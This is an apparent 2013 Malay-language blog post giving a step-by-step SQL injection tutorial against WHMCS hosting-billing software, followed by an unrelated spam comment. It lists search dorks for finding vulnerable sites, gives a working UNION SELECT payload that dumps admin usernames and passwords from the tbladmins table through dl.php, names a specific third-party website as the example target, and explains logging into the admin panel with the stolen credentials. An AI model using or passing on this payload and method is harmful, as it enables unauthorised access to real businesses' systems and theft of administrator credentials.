Monday, 11 November 2013
WHMCompleteSolution SQLI
WHMCS? WHMCS ni adalah WHMCompleteSolution dimana selalunya webapps ni digunakan untuk laman jual beli seperti laman web hosting dan domain.
Ok jom!
1. Mula-mula cari website vuln dengan dork :
- intext:"Powered by WHMCompleteSolution"
- inurl:"submitticket.php"
- inurl:dl.php?type=
2. Lepas dah dapat satu website masa untuk inject.Contoh aku dapat laman web ni :
http://www.powermailings.com/billing/dl.php?type=d&id=1
String untuk kita inject :
and 0x0=0x1 union select 1,2,3,4,CONCAT(username,0x3a3a3a,password),6,7 from tbladmins --
Sekarang tambah string tu di hujung nombor id url website tu.contoh :
http://www.powermailings.com/billing/dl.php?type=d&id=1 and 0x0=0x1 union select 1,2,3,4,CONCAT(username,0x3a3a3a,password),6,7 from tbladmins --
Lepas tu Enter!
Bila kita inject ni, kalau berjaya browser kita akan download satu file format .pdf .dalam file ni adalah Username dan Password WHMCS tu :D
3. Untuk login :
http://www.target.com/path/admin
contoh :
http://www.powermailings.com/billing/admin
Ok itu saja untuk tutorial kali ni.enjoy...
Subscribe to:
Post Comments (Atom)
Investor Network Cash flow properties In USA - Property Investor Network in USA at discounted prices. Cash flow properties a completely passive investment from acquisition to disposition of properties.
ReplyDelete